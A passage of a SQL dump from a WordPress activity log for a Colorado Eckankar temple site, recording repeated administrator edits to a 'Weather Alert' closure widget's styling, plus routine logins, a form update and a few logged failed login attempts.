class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px, rgba(0, 0, 0, 0.06) 0px 0px 0px 1px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238601,40540,'sidebar_id','null'),(238600,40540,'widget_name_translated','Custom HTML'),(238599,40540,'widget_id_base','custom_html'),(238598,40539,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238597,40539,'_server_remote_addr','76.130.120.x'),(238596,40539,'_user_email','nada@zipnadanot.org'),(238595,40539,'_user_login','S8zhaBda'),(238594,40539,'_user_id','2'),(238593,40539,'_message_key','widget_edited'),(238592,40539,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px, rgba(0, 0, 0, 0.06) 0px 0px 0px 1px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238591,40539,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(0, 0, 0, 0.16) 0px 10px 36px 0px, rgba(0, 0, 0, 0.06) 0px 0px 0px 1px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238590,40539,'sidebar_id','null'),(238589,40539,'widget_name_translated','Custom HTML'),(238588,40539,'widget_id_base','custom_html'),(238587,40538,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238586,40538,'_server_remote_addr','76.130.120.x'),(238585,40538,'_user_email','nada@zipnadanot.org'),(238584,40538,'_user_login','S8zhaBda'),(238583,40538,'_user_id','2'),(238582,40538,'_message_key','widget_edited'),(238581,40538,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(0, 0, 0, 0.16) 0px 10px 36px 0px, rgba(0, 0, 0, 0.06) 0px 0px 0px 1px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238577,40538,'widget_id_base','custom_html'),(238578,40538,'widget_name_translated','Custom HTML'),(238579,40538,'sidebar_id','null'),(238580,40538,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(0, 0, 0, 0.16) 0px 10px 36px 0px, rgba(0, 0, 0, 0.06) 0px 0px 0px 1px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238575,40537,'_server_remote_addr','76.130.120.x'),(238576,40537,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238572,40537,'_user_id','2'),(238573,40537,'_user_login','S8zhaBda'),(238574,40537,'_user_email','nada@zipnadanot.org'),(238571,40537,'_message_key','widget_edited'),(238570,40537,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(0, 0, 0, 0.16) 0px 10px 36px 0px, rgba(0, 0, 0, 0.06) 0px 0px 0px 1px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238569,40537,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238568,40537,'sidebar_id','null'),(238567,40537,'widget_name_translated','Custom HTML'),(238566,40537,'widget_id_base','custom_html'),(238565,40536,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238562,40536,'_user_login','S8zhaBda'),(238563,40536,'_user_email','nada@zipnadanot.org'),(238564,40536,'_server_remote_addr','76.130.120.x'),(238561,40536,'_user_id','2'),(238560,40536,'_message_key','widget_edited'),(238559,40536,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238556,40536,'widget_name_translated','Custom HTML'),(238557,40536,'sidebar_id','null'),(238558,40536,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(255, 255, 255) 0px 54px 55px, rgba(255, 255, 255.12) 0px -12px 30px, rgba(0, 0, 0, 0.12) 0px 4px 6px, rgba(0, 0, 0, 0.17) 0px 12px 13px, rgba(0, 0, 0, 0.09) 0px -3px 5px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238555,40536,'widget_id_base','custom_html'),(238554,40535,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238551,40535,'_user_login','S8zhaBda'),(238552,40535,'_user_email','nada@zipnadanot.org'),(238553,40535,'_server_remote_addr','76.130.120.x'),(238550,40535,'_user_id','2'),(238549,40535,'_message_key','widget_edited'),(238548,40535,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(255, 255, 255) 0px 54px 55px, rgba(255, 255, 255.12) 0px -12px 30px, rgba(0, 0, 0, 0.12) 0px 4px 6px, rgba(0, 0, 0, 0.17) 0px 12px 13px, rgba(0, 0, 0, 0.09) 0px -3px 5px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238547,40535,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(255, 255, 255) 0px 54px 55px, rgba(255, 255, 255.12) 0px -12px 30px, rgba(0, 0, 0, 0.12) 0px 4px 6px, rgba(0, 0, 0, 0.17) 0px 12px 13px, rgba(0, 0, 0, 0.09) 0px -3px 5px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238546,40535,'sidebar_id','null'),(238545,40535,'widget_name_translated','Custom HTML'),(238544,40535,'widget_id_base','custom_html'),(238543,40534,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238542,40534,'_server_remote_addr','76.130.120.x'),(238541,40534,'_user_email','nada@zipnadanot.org'),(238540,40534,'_user_login','S8zhaBda'),(238539,40534,'_user_id','2'),(238538,40534,'_message_key','widget_edited'),(238537,40534,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(255, 255, 255) 0px 54px 55px, rgba(255, 255, 255.12) 0px -12px 30px, rgba(0, 0, 0, 0.12) 0px 4px 6px, rgba(0, 0, 0, 0.17) 0px 12px 13px, rgba(0, 0, 0, 0.09) 0px -3px 5px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238536,40534,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(255, 255, 255) 0px 54px 55px, rgba(0, 0, 0, 0.12) 0px -12px 30px, rgba(0, 0, 0, 0.12) 0px 4px 6px, rgba(0, 0, 0, 0.17) 0px 12px 13px, rgba(0, 0, 0, 0.09) 0px -3px 5px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238535,40534,'sidebar_id','null'),(238534,40534,'widget_name_translated','Custom HTML'),(238533,40534,'widget_id_base','custom_html'),(238532,40533,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238531,40533,'_server_remote_addr','76.130.120.x'),(238530,40533,'_user_email','nada@zipnadanot.org'),(238529,40533,'_user_login','S8zhaBda'),(238528,40533,'_user_id','2'),(238527,40533,'_message_key','widget_edited'),(238526,40533,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(255, 255, 255) 0px 54px 55px, rgba(0, 0, 0, 0.12) 0px -12px 30px, rgba(0, 0, 0, 0.12) 0px 4px 6px, rgba(0, 0, 0, 0.17) 0px 12px 13px, rgba(0, 0, 0, 0.09) 0px -3px 5px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238524,40533,'sidebar_id','null'),(238525,40533,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(0, 0, 0, 0.25) 0px 54px 55px, rgba(0, 0, 0, 0.12) 0px -12px 30px, rgba(0, 0, 0, 0.12) 0px 4px 6px, rgba(0, 0, 0, 0.17) 0px 12px 13px, rgba(0, 0, 0, 0.09) 0px -3px 5px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(239882,40829,'plugin_name','GA Google Analytics'),(239881,40828,'_server_remote_addr','20.38.46.x'),(239880,40828,'_message_key','user_unknown_login_failed'),(239878,40828,'failed_username','admin'),(239879,40828,'server_http_user_agent','Mozilla/5.0'),(238753,40556,'failed_username','admin'),(238750,40555,'_message_key','user_unknown_login_failed'),(238751,40555,'_xmlrpc_request','true'),(238752,40555,'_server_remote_addr','81.161.229.x'),(238747,40554,'_server_remote_addr','107.189.11.x'),(238748,40555,'failed_username','admin'),(238749,40555,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(238734,40552,'_user_email','nada@zipnadanot.org'),(238735,40552,'_message_key','user_logged_out'),(238736,40552,'_server_remote_addr','76.130.120.x'),(238737,40552,'_server_http_referer','https://eckankar-colorado.org/wp-admin/'),(238738,40553,'post_id','269319'),(238739,40553,'post_type','nf_sub'),(238740,40553,'post_title',''),(238741,40553,'_message_key','post_updated'),(238742,40553,'_server_remote_addr','208.93.179.x'),(238743,40553,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(238744,40554,'failed_username','administrator'),(238745,40554,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(238746,40554,'_message_key','user_unknown_login_failed'),(238720,40551,'setting_id','sidebars_widgets[boldgrid-widget-1]'),(238721,40551,'setting_old_value','[\n    \"custom_html-14\",\n    \"custom_html-6\"\n]'),(238722,40551,'setting_new_value','[\n    \"custom_html-6\"\n]'),(238723,40551,'control_id','sidebars_widgets[boldgrid-widget-1]'),(238724,40551,'control_label',''),(238725,40551,'control_type','sidebar_widgets'),(238726,40551,'_message_key','appearance_customized'),(238727,40551,'_user_id','2'),(238728,40551,'_user_login','S8zhaBda'),(238729,40551,'_user_email','nada@zipnadanot.org'),(238730,40551,'_server_remote_addr','76.130.120.x'),(238731,40551,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238732,40552,'_user_id','2'),(238733,40552,'_user_login','S8zhaBda'),(238719,40550,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238718,40550,'_server_remote_addr','76.130.120.x'),(238717,40550,'_user_email','nada@zipnadanot.org'),(238716,40550,'_user_login','S8zhaBda'),(238715,40550,'_user_id','2'),(238714,40550,'_message_key','widget_edited'),(238713,40550,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.10) 0px 10px 36px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238703,40549,'_message_key','widget_edited'),(238704,40549,'_user_id','2'),(238705,40549,'_user_login','S8zhaBda'),(238706,40549,'_user_email','nada@zipnadanot.org'),(238707,40549,'_server_remote_addr','76.130.120.x'),(238708,40549,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238709,40550,'widget_id_base','custom_html'),(238710,40550,'widget_name_translated','Custom HTML'),(238711,40550,'sidebar_id','null'),(238712,40550,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.10) 0px 10px 36px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238702,40549,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.10) 0px 10px 36px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238692,40548,'_message_key','widget_edited'),(238693,40548,'_user_id','2'),(238694,40548,'_user_login','S8zhaBda'),(238695,40548,'_user_email','nada@zipnadanot.org'),(238696,40548,'_server_remote_addr','76.130.120.x'),(238697,40548,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238698,40549,'widget_id_base','custom_html'),(238699,40549,'widget_name_translated','Custom HTML'),(238700,40549,'sidebar_id','null'),(238701,40549,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238691,40548,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238690,40548,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238689,40548,'sidebar_id','null'),(238688,40548,'widget_name_translated','Custom HTML'),(238687,40548,'widget_id_base','custom_html'),(238686,40547,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238685,40547,'_server_remote_addr','76.130.120.x'),(238683,40547,'_user_login','S8zhaBda'),(238684,40547,'_user_email','nada@zipnadanot.org'),(238682,40547,'_user_id','2'),(238681,40547,'_message_key','widget_edited'),(238680,40547,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238679,40547,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238678,40547,'sidebar_id','null'),(238676,40547,'widget_id_base','custom_html'),(238677,40547,'widget_name_translated','Custom HTML'),(238675,40546,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238674,40546,'_server_remote_addr','76.130.120.x'),(238673,40546,'_user_email','nada@zipnadanot.org'),(238671,40546,'_user_id','2'),(238672,40546,'_user_login','S8zhaBda'),(238670,40546,'_message_key','widget_edited'),(238669,40546,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 